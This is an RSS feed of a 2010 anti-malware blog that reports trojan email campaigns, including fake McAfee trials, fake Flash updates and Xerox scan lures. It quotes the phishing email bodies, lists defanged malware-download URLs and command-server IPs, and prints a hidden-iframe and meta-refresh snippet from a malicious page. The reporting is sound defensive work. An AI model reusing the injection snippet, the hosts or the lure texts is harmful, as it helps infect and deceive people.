<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>mxlab - all about anti virus and anti spam &#187; virus</title>
	<atom:link href="http://blog.mxlab.eu/tag/virus/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.mxlab.eu</link>
	<description>mx lab blog - all about anti virus and anti spam</description>
	<lastBuildDate>Wed, 28 Jul 2010 23:26:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='blog.mxlab.eu' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/8be3c09044ac5968d17dadf3224891c4?s=96&#038;d=http://s2.wp.com/i/buttonw-com.png</url>
		<title>mxlab - all about anti virus and anti spam &#187; virus</title>
		<link>http://blog.mxlab.eu</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://blog.mxlab.eu/osd.xml" title="mxlab - all about anti virus and anti spam" />
	<atom:link rel='hub' href='http://blog.mxlab.eu/?pushpress=hub'/>
		<item>
		<title>Emails with 30-day trials of McAfee VirusScan Plus contains trojan</title>
		<link>http://blog.mxlab.eu/2010/07/28/emails-with-30-day-trials-of-mcafee-virusscan-plus-contains-trojan/</link>
		<comments>http://blog.mxlab.eu/2010/07/28/emails-with-30-day-trials-of-mcafee-virusscan-plus-contains-trojan/#comments</comments>
		<pubDate>Wed, 28 Jul 2010 09:19:11 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[McAfee VirusScan Plus]]></category>
		<category><![CDATA[McAfee]]></category>
		<category><![CDATA[VirusScan]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=971</guid>
		<description><![CDATA[MX Lab intercepted emails with the subject &#8220;McAfee VirusScan Plus&#8221; that contains a virus. The from address is in the format &#8220;xxx.be Member Services&#8221; &#60;support@xxxxx.be&#62; but the real SMTP from address comes primary from the domains rote-rose.com and rotary1918.com at this time of writing. The body of the email: Download a FREE 30-day Trial of [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=971&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted emails with the subject &#8220;McAfee VirusScan Plus&#8221; that contains a virus. The from address is in the format &#8220;xxx.be Member Services&#8221; &lt;support@xxxxx.be&gt; but the real SMTP from address comes primary from the domains rote-rose.com and rotary1918.com at this time of writing.</p>
<p>The body of the email:</p>
<blockquote><p>Download a FREE 30-day Trial of MCAfee VirusScan Plus and Be Automaticaly Entered to Win</p>
<p>Installation file attached</p></blockquote>
<p>The email contains the attachment setup.zip that contains the 144 kB large file setup.exe.</p>
<p>The trojan is known as Mal/Behav-321 (Sophos), TROJ_FAKEAV.SMXG (TrendMicro), W32/Trojan3.BWP (Authentium).</p>
<p>VirusTotal <a href="http://www.virustotal.com/file-scan/report.html?id=f80fdf4c5153edca8a601056eb3823d9942d3c02746c7036b1ab735213fada78-1280312342" target="_blank">permlink</a> and MD5: d3de1f75b8151c284ab04819994c0dc9.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/971/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/971/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/971/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/971/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/971/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/971/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/971/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/971/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/971/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/971/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=971&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/07/28/emails-with-30-day-trials-of-mcafee-virusscan-plus-contains-trojan/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Adobe Flash malware in what appears as phishing emails</title>
		<link>http://blog.mxlab.eu/2010/07/23/adobe-flash-malware-in-what-appears-as-phishing-emails/</link>
		<comments>http://blog.mxlab.eu/2010/07/23/adobe-flash-malware-in-what-appears-as-phishing-emails/#comments</comments>
		<pubDate>Fri, 23 Jul 2010 17:28:11 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=957</guid>
		<description><![CDATA[MX Lab intercepted some emails that appear to be genuine phishing emails but when investigating the included URLs further, they are in fact an attempt to install malware on a computer in the form of an important Flash Player update from Adobe. Online Banking Account Alert The first example comes from the spoofed email address [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=957&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted some emails that appear to be genuine phishing emails but when investigating the included URLs further, they are in fact an attempt to install malware on a computer in the form of an important Flash Player update from Adobe.</p>
<p><strong>Online Banking Account Alert</strong></p>
<p>The first example comes from the spoofed email address &#8220;Electronic Payments Association &lt;buttesob62@rowan-glen.com&gt;&#8221; with the subject &#8220;Online Banking Account Alert!&#8221; and this is the body of the email:</p>
<blockquote><p>You must submit verification documents to continue using your account without interruption. To view the details of this request and submit the required information, click on the following link (or copy &amp; paste it into your web browser):</p>
<p>hxxp://astroereyna.gr/</p>
<p>We thank you for your assistance in this matter.</p></blockquote>
<p>When visiting the web site with Firefox we got the message &#8220;Sorry, you need to install flash player to see this content&#8230;&#8221; and our donwload manager opened to download the file adobe_flash_install.exe. This is the code of the web site page:</p>
<pre>Sorry, you need to install flash player to see this content...

&lt;meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/
adobe_flash_install.exe" /&gt;</pre>
<pre>&lt;iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1'
 height='1' style='visibility: hidden;'&gt;&lt;/iframe&gt;</pre>
<p>However, on Safari we got an HTML frameset to access the web site. It appears that some Javascript redirection is active.</p>
<p><strong>An unauthorized transaction billed from your bank account</strong></p>
<p>The second example comes from the spoofed address &#8220;Electronic Payments Association &lt;euphemismm215@reagirona.com&gt;&#8221;, has the subject &#8220;An unauthorized transaction billed from your bank account&#8221; and  this is the body of the email:</p>
<blockquote><p>Dear bank account holder,</p>
<p>The ACH transaction, recently initiated from your bank account, was rejected by the Electronic Payments Association. Please review the transaction report by clicking the link below:</p>
<p>Unauthorized ACH Transaction Report</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Copyright ©2010 by NACHA &#8211; The Electronic Payments Association</p></blockquote>
<p>The text &#8220;Unauthorized ACH Transaction Report&#8221; contains a link to a fast flux domain. Following the link gives us the following screen in the browser, included with an download of the file adobe_flash_install.exe.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100723_flash_malware.gif" alt="" width="450" height="595" /></p>
<p>At the time of writing, no AV engines at Virus Total did detect the threat. Virus Total <a href="http://www.virustotal.com/analisis/53b687184961fbc9799509347608a5bbddb092b46f78f271c072b72d628df8b8-1279904381" target="_blank">permlink</a> and MD5: 97732f717f50c38714a3f9c8d8c6274a.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/957/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/957/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/957/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/957/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/957/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/957/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/957/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/957/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/957/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/957/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=957&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/07/23/adobe-flash-malware-in-what-appears-as-phishing-emails/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100723_flash_malware.gif" medium="image" />
	</item>
		<item>
		<title>Oficla trojan in emails with subject &#8220;Scan from a Xerox WorkCentre Pro&#8221;</title>
		<link>http://blog.mxlab.eu/2010/07/17/oficla-trojan-in-emails-with-subject-scan-from-a-xerox-workcentre-pro/</link>
		<comments>http://blog.mxlab.eu/2010/07/17/oficla-trojan-in-emails-with-subject-scan-from-a-xerox-workcentre-pro/#comments</comments>
		<pubDate>Sat, 17 Jul 2010 16:43:17 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Oficla trojan]]></category>
		<category><![CDATA[Xerox]]></category>
		<category><![CDATA[Xerox WorkCentre]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=951</guid>
		<description><![CDATA[MX Lab intercepted some emails with the subject &#8220;Scan from a Xerox WorkCentre Pro N 6204257&#8243; that contains the latest Oficla trojan variant. The emails are sent from a spoofed email address and contains a subject in one of the following formats: Scan from a Xerox WorkCentre Pro N 6204257 Scan from a Xerox WorkCentre [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=951&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted some emails with the subject &#8220;Scan from a Xerox WorkCentre Pro N 6204257&#8243; that contains the latest Oficla trojan variant. The emails are sent from a spoofed email address and contains a subject in one of the following formats:</p>
<p>Scan from a Xerox WorkCentre Pro N 6204257<br />
Scan from a Xerox WorkCentre Pro #866521</p>
<p>The email targets business users. It is quite common that an office print and scan center like a Xerox machine will send a scanned document by email to a recipient.</p>
<p>The body of the email:</p>
<blockquote><p>Please open the attached document.  It was scanned and sent to you using a Xerox<br />
WorkCentre Pro.</p>
<p>Sent by: Guest<br />
Number of Images: 1<br />
Attachment File Type: ZIP [DOC]</p>
<p>WorkCentre Pro Location: machine location not set<br />
Device Name: XRX6150AA7ACDB45706461</p>
<p>For more information on Xerox products and solutions, please visit</p>
<p>http://www.xerox.com</p></blockquote>
<p>The email contains a ZIP archive named XeroxN6204257.zip with the 32 kB large document Xerox_doc.exe inside. Note that the number of the ZIP archive matches the number in the subject line and will be different with each email.</p>
<p>The trojan is known as Gen:Variant.Oficla.4 (F-Secure, GData, NSecure) or W32/Oficla.AP (Authentium).</p>
<p>The following files will be created:</p>
<p>%Temp%\1.tmp<br />
%System%\thxr.wgo<br />
%Temp%\2.tmp<br />
%System%\svrwsc.exe</p>
<p>The following directories are created:</p>
<p>%CommonAppData%\Microsoft\OFFICE<br />
%CommonAppData%\Microsoft\OFFICE\TEMP</p>
<p>The Windows service SvrWsc - Windows Security Center Service with the filename %System%\svrwsc.exe will be stopped. Do not be fooled, the Windows Security Center Service is a malicious service and has nothing to do with the legitimate service Security Center from Windows .</p>
<p>Several Windows registry changes will be exectued and the trojan can establish connection with the following IPs on port 80:</p>
<p>80.74.132.218<br />
91.212.127.40<br />
91.216.215.66</p>
<p>Data can be obtained from following URLs:</p>
<ul>
<li>hxxp://www.kollo.ch/images/cgi.exe</li>
<li>hxxp://musiceng.ru/music/forum/index1.php</li>
<li>hxxp://hulejsoops.ru/images/bb.php?v=200&amp;id=465538349&amp;b=avpsales&amp;tm=1</li>
<li>hxxp://hulejsoops.ru/images/bb.php?v=200&amp;id=465538349&amp;tid=26&amp;b=avpsales&amp;r=1&amp;tm=1</li>
</ul>
<p>At the time of writing, only 6 of the 41 AV engines did detect the trojan at Virus Total. Virus Total <a href="http://www.virustotal.com/analisis/a77ed99ab4c50782c33e84f1ecdd511d5e1b4b943669a942bef3d5bd99e42673-1279370140" target="_blank">permlink</a> and MD5: 1d378a6bc94d5b5a702026d31c21e242.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/951/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/951/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/951/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/951/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/951/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/951/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/951/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/951/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/951/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/951/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=951&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/07/17/oficla-trojan-in-emails-with-subject-scan-from-a-xerox-workcentre-pro/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>New trojan variant in mails with &#8220;Look my CV. Thank you!&#8221;</title>
		<link>http://blog.mxlab.eu/2010/06/14/new-trojan-variant-in-mails-with-look-my-cv-thank-you/</link>
		<comments>http://blog.mxlab.eu/2010/06/14/new-trojan-variant-in-mails-with-look-my-cv-thank-you/#comments</comments>
		<pubDate>Mon, 14 Jun 2010 15:44:44 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Bredolab]]></category>
		<category><![CDATA[Eldorado]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=939</guid>
		<description><![CDATA[MX Lab intercepts a new trojan variant in emails with the subject &#8220;Look my CV. Thank you! MyID NR4557547.&#8221;. Possible subject are: Look my CV. Thank you! MyID NR4557547. Please look my CV. Thank you! MyID NR0663460. The number at the end of the subject is choosen randomly and the from email address is spoofed. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=939&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepts a new trojan variant in emails with the subject &#8220;Look my CV. Thank you! MyID NR4557547.&#8221;.</p>
<p>Possible subject are:</p>
<p>Look my CV. Thank you! MyID NR4557547.<br />
Please look my CV. Thank you! MyID NR0663460.</p>
<p>The number at the end of the subject is choosen randomly and the from email address is spoofed.</p>
<p>The body of the email:</p>
<blockquote><p>Good day.</p>
<p>I have figured out that you have an available job.<br />
I am quiet intrested in it. So I send you my resume,</p>
<p>Looking forward to your reply.<br />
Thank you.</p></blockquote>
<p>The email contains the attachment resume098.zip. The extracted file resume.exe is 36 kB large.</p>
<p>The trojan is known as W32/Heuristic-210!Eldorado (Authentium, F-Prot) or Backdoor.Bredolab (PCTools).</p>
<p>The following files are created:</p>
<p>%Temp%\1.tmp<br />
%System%\fjof.sto<br />
%Temp%\2.tmp<br />
%Windir%\atapsrb.dll</p>
<p>The following modules are loaded into the address space of other  processes:</p>
<p>%Windir%\atapsrb.dll:</p>
<p>Process name: explorer.exe<br />
Process filename: %Windir%\explorer.exe<br />
Address  space: 0x1E70000 &#8211; 0x1E82000</p>
<p>%Windir%\atapsrb.dll::</p>
<p>Process name: IEXPLORE.EXE<br />
Process filename: %ProgramFiles%\internet  explorer\iexplore.exe<br />
Address space: 0&#215;1940000 &#8211; 0&#215;1952000</p>
<p>%Windir%\atapsrb.dll::</p>
<p>Process name: [generic host process]<br />
Process filename: [generic host  process filename]<br />
Address space: 0&#215;10000000 &#8211; 0&#215;10012000</p>
<p>Several Windows registry modifications are created and the trojan attempts to establish a connection with the following IPs on port 80:</p>
<p>195.78.109.6<br />
212.78.71.81<br />
95.211.98.246</p>
<p>Data is downloaded from the following hosts:</p>
<ul>
<li>hxxp://olgashelest.ru/babun/bb.php?v=200&amp;id=603225387&amp;b=6165430227&amp;tm=1</li>
<li>hxxp://olgashelest.ru/babun/bb.php?v=200&amp;id=603225387&amp;tid=4&amp;b=6165430227&amp;r=1&amp;tm=1</li>
<li>hxxp://www.scottishchefs.com/photogallery/Slideshows/SLteam2008/p7hg_img_1/fullsize/sepod.exe</li>
</ul>
<p>At this time of writing, only 6 of the 41 AV engines at Virus Total detect this threat. Virus Total <a href="http://www.virustotal.com/analisis/e35e84cf6f5a044d6b01361995422c1b3640d0c44927b63bedb636d911a11387-1276529610" target="_blank">permlink</a> and MD5: 0ae6a2d53e86b8784d45dd56afc5c6d7.</p>
<p>The downloaded file sepod.exe, which is 60 kB large, is malware known as W32/Hiloti.I.gen!Eldorado (F-Prot),  Trojan.Win32.Hiloti (Ikarus) or Mal/Hiloti-D (Sophos).</p>
<p>The following files are created:</p>
<p>%Windir%\dsmd32.dll</p>
<p>The following modules are loaded into the address space of other processes:</p>
<p>%Windir%\dsmd32.dll:</p>
<p>Process name: explorer.exe<br />
Process filename: %Windir%\explorer.exe<br />
Address space: 0x1E70000 &#8211; 0x1E82000</p>
<p>%Windir%\dsmd32.dll:</p>
<p>Process name: [generic host process]<br />
Process filename: [generic host process filename]<br />
Address space: 0&#215;10000000 &#8211; 0&#215;10012000</p>
<p>Several Windows registry modifications are created and the trojan attempts to establish a connection with the IP 95.211.98.246 on port 80.</p>
<p>13 of the 41 AV engine at Virus Total detect this threat. Virus Total <a href="http://www.virustotal.com/analisis/f4e10a81dedb5375a33cf1bcb2026e7cd710d11d53f89baf1d5aa761922be564-1276530787" target="_blank">permlink</a> and MD5: 7a10c1118307e7cb4ecf97b40524a89c.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/939/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/939/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/939/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/939/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/939/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/939/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/939/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/939/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/939/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/939/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=939&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/06/14/new-trojan-variant-in-mails-with-look-my-cv-thank-you/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Email &#8220;Statement of fees 2009/2010&#8243; contains trojan</title>
		<link>http://blog.mxlab.eu/2010/06/11/email-statement-of-fees-20092010-contains-trojan/</link>
		<comments>http://blog.mxlab.eu/2010/06/11/email-statement-of-fees-20092010-contains-trojan/#comments</comments>
		<pubDate>Fri, 11 Jun 2010 05:04:27 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Sasfis]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=910</guid>
		<description><![CDATA[MX Lab intercepts a new trojan variant in emails with the subject &#8220;Statement of fees 2009/2010&#8243;. The trojan is known as Trojan.Sasfis (Symantec), Suspicious:W32/Malware!Gemini (F-Secure) or Mal/Zbot-U (Sophos). The body of the email: Please find attached a statement of fees as requested, this will be posted today. The accommodation is dealt with by another section [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=910&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepts a new trojan variant in emails with the subject &#8220;Statement of fees 2009/2010&#8243;. The trojan is known as Trojan.Sasfis (Symantec), Suspicious:W32/Malware!Gemini (F-Secure) or Mal/Zbot-U (Sophos).</p>
<p>The body of the email:</p>
<blockquote><p>Please find attached a statement of fees as requested, this will be posted today.<br />
The accommodation is dealt with by another section and I have passed your request on to them today.</p>
<p>Kind regards.<br />
Fred Brooks</p></blockquote>
<p>The trojan is packed in the ZIP archive Statement_of_Fees_2009-2010.zip. Once extracted, an 52 kB large file Statement_of_Fees_2009-2010.DOC.exe is available.</p>
<p>The following files are created:</p>
<p>%Temp%\1.tmp<br />
%System%\thxr.wgo<br />
%Temp%\2.tmp</p>
<p>The following registry will be created:</p>
<p>* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid</p>
<p>The following registry will be modified:</p>
<p>* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]<br />
+ Shell =</p>
<p>Connection with remote hosts 193.105.174.108 and 59.53.91.195 are established over port 80 and the following URLs are requested:</p>
<p>* hxxp://hulejsoops.ru/images/bb.php?v=200&amp;id=828459563&amp;b=b_27_spa&amp;tm=1<br />
* hxxp://russianmomds.ru/bot.exe</p>
<p>Out of the 41 AV engines at Virus Total, only 11 detect the trojan. Virus Total <a href="http://www.virustotal.com/analisis/b0a5661d090001a2853be1f862d811f4df0dacfd174c60aabd4fe6fa791a20d1-1276230562" target="_blank">permlink</a> and MD5: 180a8d1991c5dbbc01f883e5254fba0f.</p>
<p>When investigating the downloaded file bot.exe, 172 kB, which is obviously malware, we did found the following information.</p>
<p>The threat is known as Trojan-Downloader:W32/Piker.A (F-Secure), Mal/Zbot-U (Sophos), TROJ_ZBOT.BAK (Trend Micro) or TR/PSW.Zbot.173056.R.1 (AntiVir).</p>
<p>The following file is created:</p>
<p>%System%\sdra64.exe</p>
<p>The following hidden files are created:</p>
<p>%System%\lowsec\local.ds<br />
%System%\lowsec\user.ds<br />
%System%\lowsec\user.ds.lll</p>
<p>New memory pages created in the address space of the system process(es):</p>
<p>%System%\svchost.exe<br />
%System%\services.exe<br />
%System%\lsass.exe<br />
%System%\alg.exe</p>
<p>The following URLs are requested:</p>
<p>* hxxp://www.oomseekerss.ru/img/konf.bin<br />
* hxxp://www.oomseekerss.ru/cppp.php</p>
<p>29 out of the 41 AV engines did detect the treath. Virus Total  <a href="http://www.virustotal.com/analisis/261e355e92c4258d84c15ee9cfb2e26f505da0f0b55e58512a8d2493eccea971-1276187771" target="_blank">permlink</a> and MD5: f5e18b513d5b41b4905b5e216094cf9e.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/910/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/910/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/910/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/910/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/910/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/910/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/910/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/910/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/910/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/910/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=910&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/06/11/email-statement-of-fees-20092010-contains-trojan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>New Oficla trojan in messages with subject &#8220;Changelog 07.06.2010&#8243;</title>
		<link>http://blog.mxlab.eu/2010/06/08/new-oficla-trojan-in-messages-with-subject-changelog-07-06-2010/</link>
		<comments>http://blog.mxlab.eu/2010/06/08/new-oficla-trojan-in-messages-with-subject-changelog-07-06-2010/#comments</comments>
		<pubDate>Tue, 08 Jun 2010 16:16:49 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[oficla]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=907</guid>
		<description><![CDATA[MX Lab intercepted a new variant of the trojan Oficla in messages with the subject &#8220;Changelog 07.06.2010&#8243;. The from address is spoofed and choosen randomly. Some samples of the email body: Hello, as promised, Willis Dear ladies and gentlemen, as promised, Jolene Good morning, as promised, Jolene The message contains the file Changelog_07.06.20010.zip. The archive contains the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=907&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted a new variant of the trojan Oficla in messages with the subject &#8220;Changelog 07.06.2010&#8243;. The from address is spoofed and choosen randomly.</p>
<p>Some samples of the email body:</p>
<blockquote><p>Hello,<br />
as promised,<br />
Willis</p></blockquote>
<blockquote><p>Dear ladies and gentlemen,<br />
as promised,<br />
Jolene</p></blockquote>
<blockquote><p>Good morning,<br />
as promised,<br />
Jolene</p></blockquote>
<p>The message contains the file Changelog_07.06.20010.zip. The archive contains the 52 kB large file Changelog_07.06.20010.DOC.exe file.</p>
<p>The trojan is known as Win32/Oficla.GN (NOD32), W32/Oficla.Z (F-Prot), Trojan:W32/Agent.DJOH (F-Secure) or Trojan.Win32.Oficla.av (Kaspersky).</p>
<p>Virus Total <a href="http://www.virustotal.com/analisis/aa10ee545b2a6ec309afd7bf43cdb03c1d632c802e1a1e800d852f63899ee31c-1276008214" target="_blank">permlink</a> and MD5: 08c70fb3db93d29a2edcbf1593ad48f8.</p>
